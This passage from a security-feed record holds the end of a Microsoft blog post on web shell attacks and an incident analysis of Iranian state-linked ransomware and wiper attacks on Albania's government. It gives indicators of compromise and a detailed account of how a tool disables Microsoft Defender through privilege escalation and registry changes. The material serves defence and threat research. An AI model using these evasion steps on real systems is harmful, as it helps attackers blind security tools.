on the server, the backdoor implant registered itself as a service or as an [Exchange transport agent](<https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help>), which allowed it to access and intercept all incoming and outgoing emails, exposing sensitive information. The backdoor also performed additional discovery activities as well as downloaded other malware payloads. In addition, the attackers sent special emails that the DLL backdoor interpreted as commands.\n\n\n\n_Figure 1. Sample web shell attack chain_\n\nThe case is one of increasingly more common incidents of web shell attacks affecting multiple organizations in various sectors. A web shell is a piece of malicious code, often written in typical web development programming languages (e.g., ASP, PHP, JSP), that attackers implant on web servers to provide remote access and code execution to server functions. Web shells allow adversaries to execute commands and to steal data from a web server or use the server as launch pad for further attacks against the affected organization.\n\nWith the use of web shells in cyberattacks on the rise, Microsoft\u2019s DART, the Microsoft Defender ATP Research Team, and the Microsoft Threat Intelligence Center (MSTIC) have been working together to investigate and closely monitor this threat.\n\n## Web shell attacks in the current threat landscape\n\nMultiple threat actors, including [ZINC](<https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/>), [KRYPTON](<https://www.microsoft.com/security/blog/2017/12/04/windows-defender-atp-machine-learning-and-amsi-unearthing-script-based-attacks-that-live-off-the-land/>), and [GALLIUM](<https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/>), have been observed utilizing web shells in their campaigns. To implant web shells, adversaries take advantage of security gaps in internet-facing web servers, typically vulnerabilities in web applications, for example [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>) or [CVE-2019-16759](<https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/>).\n\nIn our investigations into these types of attacks, we have seen web shells within files that attempt to hide or blend in by using names commonly used for legitimate files in web servers, for example:\n\n * _index.aspx_\n * _fonts.aspx_\n * _css.aspx_\n * _global.aspx_\n * _default.php_\n * _function.php_\n * _Fileuploader.php_\n * _help.js_\n * _write.jsp_\n * _31.jsp_\n\nAmong web shells used by threat actors, the China Chopper web shell is one of the most widely used. One example is written in JSP:\n\n\n\nWe have seen this malicious JSP code within a specially crafted file uploaded to web servers:\n\n\n\n_Figure 2. Specially crafted image file with malicious JSP code_\n\nAnother China Chopper variant is written in PHP:\n\n\n\nMeanwhile, the KRYPTON group uses a bespoke web shell written in C# within an ASP.NET page:\n\n\n\n_Figure 3. Web shell written in C# within an ASP.NET page_\n\nOnce a web shell is successfully inserted into a web server, it can allow remote attackers to perform various tasks on the web server. Web shells can steal data, perpetrate watering hole attacks, and run other malicious commands for further compromise.\n\nWeb shell attacks have affected a wide range of industries. The organization in the public sector mentioned above represents one of the most common targeted sectors.\n\nAside from exploiting vulnerabilities in web applications or web servers, attackers take advantage of other weaknesses in internet-facing servers. These include the lack of the latest security updates, antivirus tools, network protection, proper security configuration, and informed security monitoring. Interestingly, we observed that attacks usually occur on weekends or during off-hours, when attacks are likely not immediately spotted and responded to.\n\nUnfortunately, these gaps appear to be widespread, given that every month, [Microsoft Defender Advanced Threat Protection (ATP)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection>) detects an average of 77,000 web shell and related artifacts on an average of 46,000 distinct machines.\n\n\n\n_Figure 3: Web shell encounters__ _\n\n## Detecting and mitigating web shell attacks\n\nBecause web shells are a multi-faceted threat, enterprises should build comprehensive defenses for multiple attack surfaces. [Microsoft Threat Protection](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides unified protection for identities, endpoints, email and data, apps, and infrastructure. Through signal-sharing across Microsoft services, customers can leverage Microsoft\u2019s industry-leading optics and security technologies to combat web shells and other threats.\n\nGaining visibility into internet-facing servers is key to detecting and addressing the threat of web shells. The installation of web shells can be detected by monitoring web application directories for web script file writes. Applications such as Outlook Web Access (OWA) rarely change after they have been installed and script writes to these application directories should be treated as suspicious.\n\nAfter installation, web shell activity can be detected by analyzing processes created by the Internet Information Services (IIS) process _w3wp.exe_. Sequences of processes that are associated with reconnaissance activity such as those identified in the alert screenshot (_net.exe_, _ping.exe_, _systeminfo.exe,_ and _hostname.exe_) should be treated with suspicion. Web applications such as OWA run from well-defined Application Pools. Any _cmd.exe_ process execution by _w3wp.exe_ running from an application pool that doesn\u2019t typically execute processes such as 'MSExchangeOWAAppPool' should be treated as unusual and regarded as potentially malicious.\n\n[Microsoft Defender ATP](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection>) exposes these behaviors that indicate web shell installation and post-compromise activity by analyzing script file writes and process executions. When alerted of these activities, security operations teams can then use the rich capabilities in Microsoft Defender ATP to investigate and resolve web shell attacks.\n\n\n\n\n\n_Figure 4. Sample Microsoft Defender ATP alerts related to web shell attacks_\n\n\n\n_Figure 5. Microsoft Defender ATP alert process tree_\n\nAs in most security issues, prevention is critical. Organizations can harden systems against web shell attacks by taking these preventive steps:\n\n * Identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Deploy latest security updates as soon as they become available.\n * Audit and review logs from web servers frequently. Be aware of all systems you expose directly to the internet.\n * Utilize the Windows Defender Firewall, intrusion prevention devices, and your network firewall to prevent command-and-control server communication among endpoints whenever possible. This limits lateral movement as well as other attack activities.\n * Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.\n * [Enable cloud-delivered protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/enable-cloud-protection-windows-defender-antivirus>) to get the latest defenses against new and emerging threats.\n * Educate end users about preventing malware infections. Encourage end users to practice good credential hygiene\u2014limit the use of accounts with local or domain admin privileges.\n\n \n\n \n\n**_Detection and Response Team (DART)_**\n\n**_Microsoft Defender ATP Research Team_**\n\n**_Microsoft Threat Intelligence Center (MSTIC)_**\n\n \n\nThe post [Ghost in the shell: Investigating web shell attacks](<https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-04T17:30:40", "type": "mssecure", "title": "Ghost in the shell: Investigating web shell attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-16759"], "modified": "2020-02-04T17:30:40", "id": "MSSECURE:8D599A5B631D1251230D906E6D71C774", "href": "https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-09T01:17:14", "description": "Shortly after the destructive cyberattacks against the Albanian government in mid-July, the Microsoft Detection and Response Team (DART) was engaged by the Albanian government to lead an investigation into the attacks. At the time of the attacks and our engagement by the Albanian government, Microsoft publicly stated that \u201cMicrosoft is committed to helping our customers be secure while achieving more. During this event, we quickly mobilized our Detection and Response Team (DART) to help the Albanian government rapidly recover from this cyber-attack. Microsoft will continue to partner with Albania to manage cybersecurity risks while continuing to enhance protections from malicious attackers.\u201d This blog showcases the investigation, Microsoft\u2019s process in attributing the related actors and the observed tactics and techniques observed by DART and the Microsoft Threat Intelligence Center (MSTIC) to help customers and the security ecosystem defend from similar attacks in the future.\n\nMicrosoft assessed with high confidence that on July 15, 2022, actors sponsored by the Iranian government conducted a destructive cyberattack against the Albanian government, disrupting government websites and public services. At the same time, and in addition to the destructive cyberattack, MSTIC assesses that a separate Iranian state-sponsored actor leaked sensitive information that had been exfiltrated months earlier. Various websites and social media outlets were used to leak this information.\n\nThere were multiple stages identified in this campaign:\n\n * Initial intrusion\n * Data exfiltration\n * Data encryption and destruction\n * Information operations\n\nMicrosoft assessed with high confidence that multiple Iranian actors participated in this attack\u2014with different actors responsible for distinct phases:\n\n * DEV-0842 deployed the ransomware and wiper malware\n * DEV-0861 gained initial access and exfiltrated data\n * DEV-0166 exfiltrated data\n * DEV-0133 probed victim infrastructure\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, the DEV reference is converted to a named actor:\n\nMicrosoft assessed with moderate confidence that the actors involved in gaining initial access and exfiltrating data in the attack are linked to EUROPIUM, which has been publicly linked to Iran\u2019s Ministry of Intelligence and Security (MOIS) and was detected using three unique clusters of activity. We track them separately based on unique sets of tools and/or TTPs; however, some of them may work for the same unit.\n\nInformation specific to Albania is shared with permission from the Albanian government.\n\nFigure 1. Threat actors behind the attack against the Albanian government\n\n## Forensic analysis\n\nEvidence gathered during the forensic response indicated that Iran-affiliated actors conducted the attack. This evidence includes, but is not limited to:\n\n * The attackers were observed operating out of Iran\n * The attackers responsible for the intrusion and exfiltration of data used tools previously used by other known Iranian attackers\n * The attackers responsible for the intrusion and exfiltration of data targeted other sectors and countries that are consistent with Iranian interests\n * The wiper code was previously used by a known Iranian actor\n * The ransomware was signed by the same digital certificate used to sign other tools used by Iranian actors\n\n### Intrusion and exfiltration\n\nA group that we assess is affiliated with the Iranian government, DEV-0861, likely gained access to the network of an Albanian government victim in May 2021 by exploiting the CVE-2019-0604 vulnerability on an unpatched SharePoint Server, administrata.al (Collab-Web2._*.*_), and fortified access by July 2021 using a misconfigured service account that was a member of the local administrative group. Analysis of Exchange logs suggests that DEV-0861 later exfiltrated mail from the victim\u2019s network between October 2021 and January 2022.\n\nDEV-0861 was observed operating from the following IPs to exfiltrate mail:\n\n * 144[.]76[.]6[.]34\n * 176[.]9[.]18[.]143\n * 148[.]251[.]232[.]252\n\nAnalysis of the signals from these IPs, and other sources, indicated that DEV-0861 has been actively exfiltrating mail from different organizations in the following countries since April 2020:\n\nFigure 2. Timeline of data exfiltration activities by DEV-0861\n\nThe geographic profile of these victims\u2014Israel, Jordan, Kuwait, Saudi Arabia, Turkey, and the UAE\u2014aligns with Iranian interests and have historically been targeted by Iranian state actors, particularly MOIS-linked actors.\n\nDEV-0166 was observed exfiltrating mail from the victim between November 2021 and May 2022. DEV-0166 likely used the tool _Jason.exe_ to access compromised mailboxes. A public analysis of _Jason.exe _can be found [here](<https://marcoramilli.com/2019/06/06/apt34-jason-project/>). Note that this tool was reportedly used by actors affiliated with MOIS.\n\nFigure 3. Screenshot of the _Jason.exe _tool\n\n### Ransomware and wiper\n\nThe cyberattack on the Albanian government used a common tactic of Iranian state sponsored actors by [deploying ransomware first](<https://www.sentinelone.com/labs/from-wiper-to-ransomware-the-evolution-of-agrius/>), followed by deployment of the wiper malware. The wiper and ransomware both had forensic links to Iranian state and Iran-affiliated groups. The wiper that DEV-0842 deployed in this attack used the same license key and EldoS RawDisk driver as ZeroCleare, a wiper that Iranian state actors used in an attack on a Middle East energy company in mid-2019. In that case, [IBM X-Force assessed](<https://www.ibm.com/downloads/cas/OAJ4VZNJ>) that actors affiliated with EUROPIUM gained initial access nearly a year ahead of the wiper attack. The wiper attack was subsequently performed by a separate and unknown Iranian actor. This is similar to the chain of events Microsoft detected against the Albanian government.\n\nThe code used in this attack had the following properties:\n\n**Filename**| **SHA-256** \n---|--- \ncl.exe| e1204ebbd8f15dbf5f2e41dddc5337e3182fc4daf75b05acc948b8b965480ca0 \nrwdsk.sys| 3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6 \n \nEmbedded in the _cl.exe_ wiper was the hex-string \u2018B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D,\u2019 which was the same license key used for the EldoS RawDisk driver of the ZeroCleare wiper documented by IBM X-Force in 2019. The Eldos driver is a legitimate tool that was also abused by the ZeroCleare wiper and was used to delete files, disks, and partitions on the target systems. While ZeroCleare is not widely used, this tool is being shared amongst a smaller number of affiliated actors including actors in Iran with links to MOIS.\n\nThe ransomware payload used in this attack by the DEV-0842 operator had the following properties:\n\n**Filename**| **SHA-256** \n---|--- \nGoXml.exe| f116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5 \n \nThis tool was signed with an invalid digital certificate from Kuwait Telecommunications Company KSC. This certificate had a SHA-1 thumbprint of 55d90ec44b97b64b6dd4e3aee4d1585d6b14b26f.\n\nMicrosoft telemetry indicates this certificate was only used to sign 15 other files\u2014a very small footprint, suggesting the certificate was not widely shared amongst unrelated actor groups. Multiple other binaries with this same digital certificate were previously seen on files with links to Iran, including a known DEV-0861 victim in Saudi Arabia in June 2021:\n\n**Filename**| **SHA-256** \n---|--- \nRead.exe| ea7316bbb65d3ba4efc7f6b488e35db26d3107c917b665dc7a81e327470cb0c1 \n \nIt\u2019s not clear if _Read.exe_ was dropped by DEV-0861 on this Saudi victim or if DEV-0861 also handed off access to the Saudi victim to DEV-0842.\n\n## Additional indications of Iranian state sponsorship\n\nThe messaging, timing, and target selection of the cyberattacks bolstered our confidence that the attackers were acting on behalf of the Iranian government. The messaging and target selection indicate Tehran likely used the attacks as retaliation for [cyberattacks Iran perceives were carried out by Israel and the Mujahedin-e Khalq (MEK)](<https://www.jpost.com/middle-east/article-708830>), an Iranian dissident group largely based in Albania that seeks to overthrow the Islamic Republic of Iran.\n\n### Messaging\n\nThe attacker\u2019s logo is an eagle preying on the symbol of the hacking group \u2018Predatory Sparrow\u2019 inside the Star of David (Figure 4). This signals the attack on Albania was retaliation for Predatory Sparrow\u2019s [operations against Iran](<https://www.jpost.com/middle-east/article-708830>), which Tehran perceives involved Israel. Predatory Sparrow has claimed responsibility for several [high-profile](<https://www.theguardian.com/world/2021/jul/11/cyber-attack-hits-irans-transport-ministry-and-railways>) and [highly sophisticated](<https://apnews.com/article/technology-middle-east-iran-dubai-b0404963ae23e5008439a0b607952de1>) [cyberattacks against Iran state-linked entities](<https://www.reuters.com/world/middle-east/irans-state-broadcaster-says-it-was-hacked-10-seconds-2022-01-27/>) since July 2021. This included a cyberattack that disrupted television programming of the Islamic Republic of Iran Broadcasting (IRIB) with images saluting MEK leaders in late January. Predatory Sparrow forewarned about the attack hours ahead of time and claimed they supported and paid for it, indicating others were involved. Iranian officials blamed this cyberattack on the MEK and additionally blamed the MEK and Israel for a cyberattack that used the same images and messaging against the Tehran municipality [in June](<https://www.bloomberg.com/news/articles/2022-01-27/iran-state-tv-says-exiled-dissidents-briefly-hacked-broadcasts>).\n\nThe message in the ransom image indicates that the MEK, a long-standing adversary of the Iranian regime, was the primary target behind their attack on the Albanian government. The ransom image, like several posts by Homeland Justice, the group overtly pushing messages and leaking data linked to the attack, asked \u201cwhy should our taxes be spent on terrorists of Durres.\u201d This is a reference to the MEK, who [Tehran considers terrorists](<https://en.mfa.ir/files/mfaen/s.pdf>), who have a large refugee camp in Durr\u00ebs County in Albania.\n\nFigure 4. Ransomware image and Homeland Justice banner\n\nThe messaging linked to the attack closely mirrored the messaging used in cyberattacks against Iran, a common tactic of Iranian foreign policy suggesting an intent to signal the attack as a form of retaliation. The level of detail mirrored in the messaging also reduces the likelihood that the attack was a false flag operation by a country other than Iran. \n\n * The contact numbers listed in the ransom image (Figure 4), for example, were linked to multiple senior Albanian leaders, mirroring the cyberattacks on Iran\u2019s railways and fueling pumps, which included [a contact phone number belonging to the Iranian Supreme Leader\u2019s Office](<https://twitter.com/IranIntl_En/status/1452944995741315079>).\n * The messages in the information operations also emphasized targeting of corrupt government politicians and their support for terrorists and an interest in not harming the Albanian people (Figure 5). Similarly, the attack on Iranian steel companies claimed to [target the steel factories](<https://twitter.com/GonjeshkeDarand/status/1541288345183158272?cxt=HHwWgIC88a7l4OMqAAAA>) for their connections to the Islamic Revolutionary Guard Corps (IRGC) while avoiding harm to Iranians. Another [cyberattack on an Iranian airline](<https://www.timesofisrael.com/blacklisted-iranian-airlines-targeted-in-cyberattack/>) in late 2021, which was claimed by Hooshyaran-e Vatan (meaning \u201cObservants of the Fatherland\u201d in Farsi), emphasized Tehran\u2019s corruption and misappropriation of money on IRGC activities abroad. \nFigure 5. Message from Homeland Justice days after the cyberattack.\n\n### Timing\n\nThe cyberattack on July 15 occurred weeks after [a string of cyberattacks on Iran](<https://www.iranintl.com/en/202207032504>), one week ahead of the MEK-sponsored Free Iran World Summit and aligned with other Iranian policy moves against the MEK, further bolstering the likelihood of Iranian involvement. On July 16, the day after the cyberattack, Iran\u2019s Ministry of Foreign Affairs issued [a statement](<https://www.iranintl.com/en/202207162442>) designating current and former American politicians for supporting the MEK. The Free Iran World Summit, which the Iranian regime actively opposes, was [canceled this year](<https://abcnews.go.com/International/wireStory/terror-threat-cancels-iranian-oppositions-summit-albania-87267980>) following warnings of [possible terrorist threats](<https://al.usembassy.gov/security-alert-threat-targeting-the-free-iran-world-summit-july-21-2022/>) to the Summit on July 21. A few days after the planned Free Iran World Summit, Iranian official press issued an editorial calling for military action against the MEK in Albania. This string of events suggests there may have been a whole-of-government Iranian effort to counter the MEK from Iran\u2019s Ministry of Foreign Affairs, to intelligence agencies, to official press outlets.\n\n### Target selection\n\nSome of the Albanian organizations targeted in the destructive attack were the equivalent organizations and government agencies in Iran that experienced prior cyberattacks with MEK-related messaging. This suggests the Iranian government chose those targets to signal the cyberattacks as a form of direct and proportional retaliation, a common tactic of the regime.\n\n## Parallel information operations and amplification\n\nBefore and after the Homeland Justice messaging campaign was launched, social media persona accounts and a group of real-life Iranian and Albanian nationals known for their pro-Iran, anti-MEK views, promoted the campaign\u2019s general talking points and amplified the leaks published by the Homeland Justice accounts online. The parallel promotion of the Homeland Justice campaign and its central themes by these entities in the online space\u2014before and after the cyberattack\u2014suggests a broad-based information operation aimed at amplifying the impact of the attack.\n\nAhead of the cyberattack, on June 6, Ebrahim Khodabandeh, a disaffected former MEK member posted [an open letter](<https://web.archive.org/web/20220907003825/https:/www.nejatngo.org/en/posts/14089>) addressed to Albanian Prime Minister Edi Rama warning of the consequences of escalating tensions with Iran. Invoking \u201c[h]acking of Tehran municipal systems\u201d and \u201c[gas stations](<https://www.npr.org/2021/10/27/1049566231/irans-president-says-cyberattack-was-meant-to-create-disorder-at-gas-pumps>),\u201d Khodabandeh claimed that the MEK was the source of \u201csabotaging acts against the interests of the Iranian people [sic]\u201d and argued that these constituted \u201cthe hostile work of your government\u201d and has caused \u201cobvious enmity with the Iranian nation [sic].\u201d\n\nFour days later, on June 10, Khodabandeh and the Nejat Society, an anti-MEK NGO that he heads, hosted a group of Albanian nationals in Iran. The group included members of another anti-MEK organization called the Association for the Support of Iranians Living in Albania (ASILA)\u2014Gjergji Thanasi, Dashamir Mersuli, and Vladimir Veis. Given the highly political nature of ASILA\u2019s work on issues related to a group that Tehran considers a terrorist organization (the MEK), it is highly possible that this visit was conducted with sanction from the state. Upon their return from Iran, on July 12, Nejat Society said Albanian [police raided their offices](<https://archive.vn/zhR7m>) and detained some ASILA members. While Nejat Society said this raid was a result of \u201cfalse and baseless accusations,\u201d [according to local media](<https://nacionale.com/kulture/beteja-mes-muhaxhedineve-dhe-revolucionareve-ne-iran-eskalon-ne-panairin-e-librit-ne-durres>) the raid stemmed from possible connections to Iranian intelligence services.\n\nFigure 6. ASILA members in Iran in June 2022. Pictured, from left, are Gjergji Thanasi, Ebrahim Khodabandeh, Dashamir Mersuli, and Vladimir Veis.\n\nIn the wake of the cyberattack, on July 23, Thanasi and Olsi Jazexhi, another Albanian national who frequently appears on Iran\u2019s state-sponsored media outlet PressTV espousing anti-MEK positions, penned [a second open letter](<https://archive.vn/N8yZN>) addressed to then-Albanian President Ilir Meta, also published on Nejat Society\u2019s website. This letter echoed Homeland Justice\u2019s central claim\u2014namely that Albania\u2019s continuing to host the MEK constituted a danger to the Albanian people. Jazexhi and Thanasi called on Meta to convene Albania\u2019s National Security Council to \u201cconsider whether Albania has entered into a cyber and military conflict with the Islamic Republic of Iran.\u201d\n\nIn May 2021, at around the same time that Iranian actors began their intrusion into Albanian government victim systems, accounts for [two anti-MEK](<https://twitter.com/ali_pouladi>) [social media personas](<https://twitter.com/OliverCarol11>), which do not appear to correspond to real people, were created on both Facebook and Twitter. The accounts largely post anti-MEK content and engage with the social media accounts of some of the individuals detailed above. These two accounts along with a third, older account, were among the first to promote posts from Homeland Justice accounts on Twitter, and all three dramatically increased the rate of anti-MEK posts after the mid-July 2022 cyberattack became public.\n\nThere exists some additional evidence that the role of these personas extended beyond mere social media amplification and into content production. One of the personas which repeatedly posted Homeland Justice content had previously written for the now-defunct [IRGC-linked American Herald Tribune](<https://www.justice.gov/opa/pr/united-states-seizes-27-additional-domain-names-used-iran-s-islamic-revolutionary-guard-corps>) and other fringe news sites, often in negative terms about the MEK. A second persona account, meanwhile, may have [attempted to contact at least one Albanian newspaper](<https://web.archive.org/web/20220907002152/https:/twitter.com/ali_pouladi/status/1560161092231380994>) ahead of the hack-and-leak, requesting \u201ccooperation\u201d, and the ability to publish with the outlet.\n\nThe parallel promotion of the Homeland Justice campaign and its central themes by these individuals and personas online both before and after the cyberattack adds a compelling human dimension to the broader Homeland Justice influence effort. While there were no observed direct relationships between the threat actors responsible for the destructive attack and these messaging actors, their actions raise questions worthy of further examination.\n\n## Observed actor activity\n\nDART and MSTIC supported the post ransom and wiper attack analysis leveraging [Microsoft 365 Defender](<https://www.microsoft.com/security/business/siem-and-xdr/microsoft-365-defender>) and collection of additional forensic artifacts. Analysis identified the use of vulnerabilities to implant web shells for persistence, reconnaissance actions, common credential harvesting techniques, defense evasion methods to disable security products, and a final attempt of actions on objective deploying encryption and wiping binaries. The Iranian sponsored attempt at destruction had less than a 10% total impact on the customer environment.\n\n### Access and implant\n\nBased on investigative analysis, starting in May 2021, actors exploited vulnerabilities of a public-facing endpoint to execute arbitrary code that implanted web shells on the unpatched SharePoint server (Collab-Web2.*.*), as stated previously. These generic web shells provided the ability to upload files, download files, delete files, rename, execute commands with an option to run as specific user.\n\nFigure 7. The web shell console from the attacker\u2019s point of view\n\nWeb shells were placed in the following directories:\n\n * C:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\evaluatesiteupgrade.cs.aspx\n * C:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\Pickers.aspx\n * C:\\ProgramData\\COM1\\frontend\\Error4.aspx\n\n### Lateral movement and execution\n\nFollowing initial access and implant, the threat actor was observed using Mimikatz for credential harvesting and a combination of Impacket and Remote Desktop Clients for lateral movement efforts using the built-in administrator account. Unrecoverable tooling was identified, which highly suggests that reconnaissance efforts were present in the form of file names of executables, resident mailbox data, database, and user details. Similar actions by the threat actors observed by MSTIC and DART detail both custom and open-source tooling utilized for these efforts. Artifacts of tooling identified:\n\n * IPGeter.exe\n * FindUser.exe\n * recdisc.exe\n * NetE.exe\n * advanced_port_scanner.exe\n * mimikatz.exe\n * shared.exe\n * Stored CSV and TXT files\n\n### Data collection\n\nDuring the period of October 2021 \u2013 January 2022, the threat actors used a unique email exfiltration tool which interacted with the Exchange web services APIs to collect email in a manner that masked the actions. The threat actors accomplished these actions by creating an identity named \u201cHealthMailbox55x2yq\u201d to mimic a Microsoft Exchange Health Manager Service account using Exchange PowerShell commands on the Exchange Servers. The threat actors then added the account to the highly privileged exchange built-in role group \u201cOrganization Management\u201d to later add the role of \u201cApplication Impersonation\u201d. The [ApplicationImpersonation](<https://docs.microsoft.com/exchange/applicationimpersonation-role-exchange-2013-help>) management role enables applications to impersonate users in an organization to perform tasks on behalf of the user, providing the ability for the application to act as the owner of a mailbox.\n\n### Defense evasion\n\nPrior to launching the final stage of the attack, the threat actors gained administrative access to a deployed endpoint detection and response (EDR) solution to make modifications, removing libraries that affected the agents across the enterprise. In addition, a binary to disable components of Microsoft Defender Antivirus was propagated using custom tooling. The distributed binary named _disable-defender.exe_ queries for TokenElevation using the GetTokenInformation API and checks if the process is running with elevated privileges. If the token is not running with elevated privilege, the binary prints &quot;Must run as admin!\\n&quot;. If the token is elevated, it queries TokenUser and checks if the SID is &quot;S-1-5-18&quot;. If the current process doesn&#x27;t run under system context, it prints &quot;Restarting with privileges\\n&quot; and attempts to elevate the privilege.\n\nTo elevate the privilege, the binary checks if the TrustedInstaller service is enabled. To do this, it starts the service &quot;SeDebugPrivilege&quot; and &quot;SeImpersonatePrivilege&quot; to assign privileges to itself. It then looks for _winlogon.exe_ process, acquires its token, and impersonates calling thread using ImpersonateLoggedOnUser/SetThreadToken. After impersonating as _winlogon.exe_, it opens TrustedInstaller process, acquires its token for impersonation and creates a new process with elevated privileges using CreateProcessWithTokenW.\n\nFigure 8. How the attacker is able to evade defense components\n\nOnce it successfully creates its own process with TrustedInstaller privilege, it proceeds to disable Defender components.\n\n * Terminates smartscreen.exe\n * Modifies WinDefend service to DemandLoad.\n * Modifies &quot;TamperProtection&quot; value to 0\n * Queries WMI &quot;Root\\Microsoft\\Windows\\Defender&quot; Namespace &quot;MSFT_MpPreference&quot; class for &quot;DisableRealtimeMonitoring&quot;\n * Sets &quot;DisableAntiSpyware&quot; value to 1\n * Sets &quot;SecurityHealth&quot; value to 3\n * Sets &quot;DisableAntiSpyware&quot; value to 0\n * Sets &quot;SYSTEM\\CurrentControlSet\\Services\\WinDefend&quot; service &quot;Start&quot; value to 3\n * Sets &quot;DisableRealtimeMonitoring&quot; value to 1\n * Modifies further settings using WMI &quot;Root\\Microsoft\\Windows\\Defender&quot; Namespace &quot;MSFT_MpPreference&quot; class values,\n * &quot;EnableControlledFolderAccess&quot;\n * &quot;PUAProtection&quot;\n * &quot;DisableRealtimeMonitoring&quot;\n * &quot;DisableBehaviorMonitoring&quot;\n * &quot;DisableBlockAtFirstSeen&quot;\n * &quot;DisablePrivacyMode&quot;\n * &quot;SignatureDisableUpdateOnStartupWithoutEngine&quot;\n * &quot;DisableArchiveScanning&quot;\n * &quot;DisableIntrusionPreventionSystem&quot;\n * &quot;DisableScriptScanning&quot;\n * &quot;DisableAntiSpyware&quot;\n * &quot;DisableAntiVirus&quot;\n * &quot;SubmitSamplesConsent&quot;\n * &quot;MAPSReporting&quot;\n * &quot;HighThreatDefaultAction&quot;\n * &quot;ModerateThreatDefaultAction&quot;\n * &quot;LowThreatDefaultAction&quot;\n * &quot;SevereThreatDefaultAction&quot;\n * &quot;ScanScheduleDay&quot;\n\nAdditional evasion techniques included the deletion of tooling, Windows events, and application logs.\n\n### Actions on objective\n\nDistribution of the encryption and wiping binaries was accomplished with two methods via a custom SMB remote file copy tool _Mellona.exe_, originally named _MassExecuter.exe_. The first method remote file copied the ransom binary _GoXml.exe_ and a bat file that triggers the execution of the ransom or wiper on a user login. The second method was by remotely invoking the ransom binary with the _Mellona.exe_ tool, post SMB remote file copy.\n\nFigure 9. Process Command lines for _Mellona.exe_ used to distribute malware\n\n _win.bat_ \u2013 Batch file for ransom execution - Trojan:Win32/BatRunGoXml\n\n * Executes the ransom binary from the All Users starts up folder and will be executed on the trigger of a user login.\nFigure 10. _Win.bat _contents\n\n_GoXml.exe_ \u2013 ransomware binary - Ransom:Win32/Eagle!MSR\n\n * Takes &gt;= 5 arguments, and the arguments can be anything, as it looks for argument count only. If the number of the command line arguments is less than 5, it will error and create an Open dialog box via GetOpenFileNameA that lets the user open a *.xml file\n * If 5 or more command line arguments were provided, it will firstly check the running instances by opening the Mutex below via OpenMutexA:\n \n \n \u201cGlobal\\\\abcdefghijklmnoklmnopqrstuvwxyz01234567890abcdefghijklmnopqrstuvwxyz01234567890\u201d\n\n * If there are no other running instances, it will create the Mutex above via CreateMutexA.\n * Attempts to mount all the volumes:\n * Finds available volumes via FindFirstVolumeW and FindNextVolumeW.\n * Retrieves the mounted folders of the volume via GetVolumePathNamesForVolumeNameW.\n * If there is no mounted point for the volume, creates a new directory named c:\\\\\\HD%c (%c is A, B, C, \u2026) via CreateDirectoryW.\n * Mounts the volume to the newly create directory via SetVolumeMountPointW.\n * Launches _cmd.exe _and runs the following batch script through anonymous pipe:\nFigure 11. Batch script content of the ransomware\n\n * Strings are encrypted with RC4 Algorithm with key \u201c8ce4b16b22b58894aa86c421e8759df3\u201d.\n * Generates Key using rand() function and uses that to derive RC4 key to encrypt files. The derived key is then encrypted with Public key hardcoded in the file.\n * This encrypted key is then encoded with customized Base64 characters and appended to the ransom note.\n * Renames the file as _[original file name].lck_, and then encrypts the renamed file.\n * Drops a ransom notes file named _How_To_Unlock_MyFiles.txt_ in each folder before encrypting the files, the ransom notes are written in Albanian.\nFigure 12. Ransom note written in Albanian\n\n * Performs a self-delete by launching _cmd.exe_ and executes a batch script though anonymous pipe to perform deletion.\nFigure 13. Batch script for deletion\n\n_cl.exe_ \u2013 wiper \u2013 Dos:Win64/WprJooblash\n\n * _cl.exe_ takes the following parameters\n * cl.exe in \u2013 Installs the driver _rwdsk.sys _and its service\n * cl.exe un \u2013 Uninstalls the driver _rwdsk.sys _and its service\n * cl.exe wp &lt;PATH&gt; - 